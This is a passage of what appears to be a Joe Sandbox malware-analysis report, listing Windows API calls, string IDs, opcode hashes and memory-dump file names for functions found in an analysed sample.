        • Opcode ID: 478a8c392499d8796d0c1490999cf420031e6438dc142f8d2d7e7825424722c4
        • Instruction ID: 93c15d6416793c155bdbf43f5f13427bbab7fbfc4f9a935c496d1a0cfaa07f8d
        • Opcode Fuzzy Hash: 478a8c392499d8796d0c1490999cf420031e6438dc142f8d2d7e7825424722c4
        • Instruction Fuzzy Hash: 2EE03971244284AADF215B74BC0DBE93B20AB12336F648229F6BE580E1C3B246909B10
        APIs
        • GetCurrentThread.KERNEL32 ref: 00241634
        • OpenThreadToken.ADVAPI32(00000000,?,?,?,002411D9), ref: 0024163B
        • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,002411D9), ref: 00241648
        • OpenProcessToken.ADVAPI32(00000000,?,?,?,002411D9), ref: 0024164F
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: CurrentOpenProcessThreadToken
        • String ID:
        • API String ID: 3974789173-0
        • Opcode ID: 61c7478aeabc91fe3d8e2cf987ea20f5903b62d2cb8bfd9cf0f9efe128e4b604
        • Instruction ID: d2f16e34d7ab1c07b6182d34b23edf25c67b7b31950e467fc641892a0ce63b10
        • Opcode Fuzzy Hash: 61c7478aeabc91fe3d8e2cf987ea20f5903b62d2cb8bfd9cf0f9efe128e4b604
        • Instruction Fuzzy Hash: 0AE08C32602222EBD7202FB0BE0DB863B7CAF44792F25884CF749D9090E63484D0CBA4
        APIs
        • GetDesktopWindow.USER32 ref: 0023D858
        • GetDC.USER32(00000000), ref: 0023D862
        • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0023D882
        • ReleaseDC.USER32(?), ref: 0023D8A3
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: CapsDesktopDeviceReleaseWindow
        • String ID:
        • API String ID: 2889604237-0
        • Opcode ID: 3635aed65a872f002324c1204818f7be829f60f571b93d73147c45a00f8eceb0
        • Instruction ID: ff9485101178d295ab4bd3b8d73ca71184ea786f90a234e7d61a03e1f208832f
        • Opcode Fuzzy Hash: 3635aed65a872f002324c1204818f7be829f60f571b93d73147c45a00f8eceb0
        • Instruction Fuzzy Hash: E6E01AB0800204DFCB41AFB1E84C66DBBB6FB48310F208009F91AE7250CB385982AF40
        APIs
        • GetDesktopWindow.USER32 ref: 0023D86C
        • GetDC.USER32(00000000), ref: 0023D876
        • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0023D882
        • ReleaseDC.USER32(?), ref: 0023D8A3
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: CapsDesktopDeviceReleaseWindow
        • String ID:
        • API String ID: 2889604237-0
        • Opcode ID: 729955c8faf436b5ded6581cd6647d89098bc8d77aab0a397d28503e6be88c2f
        • Instruction ID: c7223e0b281a260ecef46ef8ada1ceaed7fc89578bae018e1cc5e47891044ce0
        • Opcode Fuzzy Hash: 729955c8faf436b5ded6581cd6647d89098bc8d77aab0a397d28503e6be88c2f
        • Instruction Fuzzy Hash: 87E09A75800204DFCB51AFB5E84C66DBBB5BB48311B248449F95AE7250DB3959419F50
        APIs
          • Part of subcall function 001E7620: _wcslen.LIBCMT ref: 001E7625
        • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00254ED4
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: Connection_wcslen
        • String ID: *$LPT
        • API String ID: 1725874428-3443410124
        • Opcode ID: e6a45f5f7e3e8929936254977ad9c45723937744e60278d1bc778e403c8db749
        • Instruction ID: 23ed67ab3cda860ad7f18fd5416abbcca50228886dfeb70606d26cf1ac9012e8
        • Opcode Fuzzy Hash: e6a45f5f7e3e8929936254977ad9c45723937744e60278d1bc778e403c8db749
        • Instruction Fuzzy Hash: 9D9172759102459FDB14DF58C484EA9FBF1BF48308F148099E80A5F7A2C771ED99CB94
        APIs
        • __startOneArgErrorHandling.LIBCMT ref: 0020E30D
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: ErrorHandling__start
        • String ID: pow
        • API String ID: 3213639722-2276729525
        • Opcode ID: db6df330c7251997f6e161e9f345667f365e959bf2d4b7d0ce839fa9aeeb0fb9
        • Instruction ID: da9d208e3195d031020fc19c7fe403a0b5b5ad7aa87840a5bbd1549c2c9d5c4a
        • Opcode Fuzzy Hash: db6df330c7251997f6e161e9f345667f365e959bf2d4b7d0ce839fa9aeeb0fb9
        • Instruction Fuzzy Hash: 73517A71A3D30796CF157F14D9453FA2BF4ABA0740F304DA8E495822EADB318CF59A86
        APIs
        • CharUpperBuffW.USER32(0023569E,00000000,?,0027CC08,?,00000000,00000000), ref: 002678DD
          • Part of subcall function 001E6B57: _wcslen.LIBCMT ref: 001E6B6A
        • CharUpperBuffW.USER32(0023569E,00000000,?,0027CC08,00000000,?,00000000,00000000), ref: 0026783B
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: BuffCharUpper$_wcslen
        • String ID: <s*
        • API String ID: 3544283678-228140549
        • Opcode ID: 753371017060c0a759b0d672925044ecd63bb7282b3aa987696eb3b1ea6592bc
        • Instruction ID: 8c62f38ebd39b66ed61901bdde3f34db715afecd14f00ec43145a60d0576e18c
        • Opcode Fuzzy Hash: 753371017060c0a759b0d672925044ecd63bb7282b3aa987696eb3b1ea6592bc
        • Instruction Fuzzy Hash: 9E618032924559ABCF04EFA5EC91DFDB3B4BF24304B944129F542B7091EF306A95DBA0
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID:
        • String ID: #
        • API String ID: 0-1885708031
        • Opcode ID: 758ce69736fdab334ecc77d38a1518266419171c692ffef0ed3c5e649398b552
        • Instruction ID: a061cfd13bebfbac95d06831e5b053dc2eea4fad011b87d1820e42858e6d90dd
        • Opcode Fuzzy Hash: 758ce69736fdab334ecc77d38a1518266419171c692ffef0ed3c5e649398b552
        • Instruction Fuzzy Hash: 115133B590024ADFDF18DF28C481ABEBBA8EF65310F254055F9919B2E0E7309D56CB90
        APIs
        • Sleep.KERNEL32(00000000), ref: 001FF2A2
        • GlobalMemoryStatusEx.KERNEL32(?), ref: 001FF2BB
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: GlobalMemorySleepStatus
        • String ID: @
        • API String ID: 2783356886-2766056989
        • Opcode ID: 033e56bb0b92b8644cd33605d4a5ad56dac7ce6c5e9987d87c37b451806fe363
        • Instruction ID: 8ae69c0b8b2fe8ea88015ae7c68dda2484deed2b6f781cd7d6c85a257261a667
        • Opcode Fuzzy Hash: 033e56bb0b92b8644cd33605d4a5ad56dac7ce6c5e9987d87c37b451806fe363
        • Instruction Fuzzy Hash: 62515771408B859BE320AF15EC86BAFBBF8FF95300F81885DF1D941195EB318529CB66
        APIs
        • CharUpperBuffW.USER32(?,?,?,00000003,?,?), ref: 002657E0
        • _wcslen.LIBCMT ref: 002657EC
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: BuffCharUpper_wcslen
        • String ID: CALLARGARRAY
        • API String ID: 157775604-1150593374
        • Opcode ID: 6b03ba83c80cc368282cb4928cd4c1794d73dcf4820cc134eb67cabfc4652093
        • Instruction ID: 90a15e91d4d68a7d51c1bce7c24ccf55096cbdf9735dc1622c741d157b8bd087
        • Opcode Fuzzy Hash: 6b03ba83c80cc368282cb4928cd4c1794d73dcf4820cc134eb67cabfc4652093
        • Instruction Fuzzy Hash: A3419D71A2061A9FCB14DFA9C8859BEBBB5EF59320F104029E505A7292E7709DD1CB90
        APIs
        • _wcslen.LIBCMT ref: 0025D130
        • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 0025D13A
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: CrackInternet_wcslen
        • String ID: |
        • API String ID: 596671847-2343686810
        • Opcode ID: 95b2f1b14d6049365ec30a4ce9c52f6bafcfda39343fe503c3687191685f62c7
        • Instruction ID: 8e0396b4b1be5a64bdbd2af9847a30a446dbce2cc356049370497b8b4a557de1
        • Opcode Fuzzy Hash: 95b2f1b14d6049365ec30a4ce9c52f6bafcfda39343fe503c3687191685f62c7
        • Instruction Fuzzy Hash: 90316F71D10209ABCF15EFA5CC85EEEBFB9FF14340F404059F819A6162DB31AA56CB64
        APIs
        • DestroyWindow.USER32(?,?,?,?), ref: 00273621
        • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 0027365C
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: Window$DestroyMove
        • String ID: static
        • API String ID: 2139405536-2160076837
        • Opcode ID: 143b67c140cea473060c7ca5ac1cdac4d8557be5cf8ae25507cd58b9465f7b67
        • Instruction ID: 939c7a3bb165db3c644567242bff1fd777419d3fbfe4e8497aaf1c699bb0e65e
        • Opcode Fuzzy Hash: 143b67c140cea473060c7ca5ac1cdac4d8557be5cf8ae25507cd58b9465f7b67
        • Instruction Fuzzy Hash: 9031A171110605AADB10DF38DC40EBB73ADFF98720F50C619F86997180DB30AD91D764
        APIs
        • SendMessageW.USER32(00000027,00001132,00000000,?), ref: 0027461F
        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00274634
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: MessageSend
        • String ID: '
        • API String ID: 3850602802-1997036262
        • Opcode ID: 9ad8b5820369f52c36947fb1240e2bc48176fa83e4c9051554dbe950d43c0192
        • Instruction ID: a62dcb10aea65ad0260eed254c7d330420634f29db2c1d4043b48e193f8f8694
        • Opcode Fuzzy Hash: 9ad8b5820369f52c36947fb1240e2bc48176fa83e4c9051554dbe950d43c0192
        • Instruction Fuzzy Hash: 5D314874A0020A9FDB14DFA9C990BDA7BB9FF19300F50816AE908AB351D770E951CF90
        APIs
        • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0027327C
        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00273287
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: MessageSend
        • String ID: Combobox
        • API String ID: 3850602802-2096851135
        • Opcode ID: 7df6ccf0762e59b1f71a0ce357fbc962dea94190000e972e79c7a3456acfe1af
        • Instruction ID: 60093bc38e6696f153e62ad871647a548825352c3cfc5893eec911bccad7fffb
        • Opcode Fuzzy Hash: 7df6ccf0762e59b1f71a0ce357fbc962dea94190000e972e79c7a3456acfe1af
        • Instruction Fuzzy Hash: 401104713202097FFF25DF54DC84EBB376AEB983A4F208128F91CA7291D6319D619B60
        APIs
          • Part of subcall function 001E600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 001E604C
          • Part of subcall function 001E600E: GetStockObject.GDI32(00000011), ref: 001E6060
          • Part of subcall function 001E600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 001E606A
        • GetWindowRect.USER32(00000000,?), ref: 0027377A
        • GetSysColor.USER32(00000012), ref: 00273794
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: Window$ColorCreateMessageObjectRectSendStock
        • String ID: static
        • API String ID: 1983116058-2160076837
        • Opcode ID: a05467fcf779489a6c9783ef635b38155809338a6212a7eec3eb43208d2a2f76
        • Instruction ID: e273a6dfd1aa585e52caa635fc0a43ad4d13879c58d3a6a7d506a141d084de9b
        • Opcode Fuzzy Hash: a05467fcf779489a6c9783ef635b38155809338a6212a7eec3eb43208d2a2f76
        • Instruction Fuzzy Hash: 30113AB262020AAFDF00DFB8DC49EEE7BB8FB09354F104918F959E2250D775E8619B50
        APIs
        • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0025CD7D
        • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 0025CDA6
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: Internet$OpenOption
        • String ID: <local>
        • API String ID: 942729171-4266983199
        • Opcode ID: f8e38a7a7e88d5b8871bccf896b7e02583300d26479268be01fcc7a85cc83bd2
        • Instruction ID: 2e12d1bff07a5123e3e74450290b28851ac8af3edc3ca1cd0847e3589f2fb6da
        • Opcode Fuzzy Hash: f8e38a7a7e88d5b8871bccf896b7e02583300d26479268be01fcc7a85cc83bd2
        • Instruction Fuzzy Hash: 1F11A7711267367ED7284A668C49FE7BEBCEB127A5F204239B509C2080E7705854D6F4
        APIs
        • GetWindowTextLengthW.USER32(00000000), ref: 002734AB
        • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 002734BA
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: LengthMessageSendTextWindow
        • String ID: edit
        • API String ID: 2978978980-2167791130
        • Opcode ID: b4eddd52bde2b46ea8a64b0299d8ed8540ec0e2881977a0d9c5a7eaba0e1ba77
        • Instruction ID: a3831f2eee671a7ec07b03ffbf318295fd6248750dee8c24e6ca847d7df30168
        • Opcode Fuzzy Hash: b4eddd52bde2b46ea8a64b0299d8ed8540ec0e2881977a0d9c5a7eaba0e1ba77
        • Instruction Fuzzy Hash: 5A11C171120109AFEB158E74EC54AFB376AEF15374F608324FA68931D0C771DCA1AB50
        APIs
          • Part of subcall function 001E9CB3: _wcslen.LIBCMT ref: 001E9CBD
        • CharUpperBuffW.USER32(?,?,?), ref: 00246CB6
        • _wcslen.LIBCMT ref: 00246CC2
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: _wcslen$BuffCharUpper
        • String ID: STOP
        • API String ID: 1256254125-2411985666
        • Opcode ID: 70de8e7697279e6cd24b863d357e8e8c4e22c1f826cf4eba7f872d9ebcde15d1
        • Instruction ID: 1dcc8409a6ab7d514915c037839eaab4963fd837361df1eb33ad11448b33d924
        • Opcode Fuzzy Hash: 70de8e7697279e6cd24b863d357e8e8c4e22c1f826cf4eba7f872d9ebcde15d1
        • Instruction Fuzzy Hash: 68010432A205278BCB28AFFDDC888BF73A4EF627147500529E85297190EB31DC60CA51
        APIs
          • Part of subcall function 001E9CB3: _wcslen.LIBCMT ref: 001E9CBD
          • Part of subcall function 00243CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00243CCA
        • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00241D4C
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: ClassMessageNameSend_wcslen
        • String ID: ComboBox$ListBox
        • API String ID: 624084870-1403004172
        • Opcode ID: 7632a41a73e40482e749d772a28e284a6ce72a5569381a6ddf040f06f98dea5e
        • Instruction ID: 5402f0d210e0ae6b6959414530c3dc8d220c508f497a880a48beaca9eb69241c
        • Opcode Fuzzy Hash: 7632a41a73e40482e749d772a28e284a6ce72a5569381a6ddf040f06f98dea5e
        • Instruction Fuzzy Hash: 11012871A20218AB8B1CFFA0CC51DFE7368FF57350B10090AF822572D1EB3059688660
        APIs
          • Part of subcall function 001E9CB3: _wcslen.LIBCMT ref: 001E9CBD
          • Part of subcall function 00243CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00243CCA
        • SendMessageW.USER32(?,00000180,00000000,?), ref: 00241C46
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: ClassMessageNameSend_wcslen
        • String ID: ComboBox$ListBox
        • API String ID: 624084870-1403004172
        • Opcode ID: 20f41d9ffaae27b08ee6802d2024afd2847392415e73efa206c656c10b89cfe7
        • Instruction ID: 4076a9702c089cacb07be823f718416a197dad83a90c9b662d64254d0af6caef
        • Opcode Fuzzy Hash: 20f41d9ffaae27b08ee6802d2024afd2847392415e73efa206c656c10b89cfe7
        • Instruction Fuzzy Hash: 7D01A7756A111967CB1CFBA0DD91EFF77A89F22340F14041AE80667281EA609E7896B2
        APIs
          • Part of subcall function 001E9CB3: _wcslen.LIBCMT ref: 001E9CBD
          • Part of subcall function 00243CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00243CCA
        • SendMessageW.USER32(?,00000182,?,00000000), ref: 00241CC8
        Strings
        Memory Dump Source
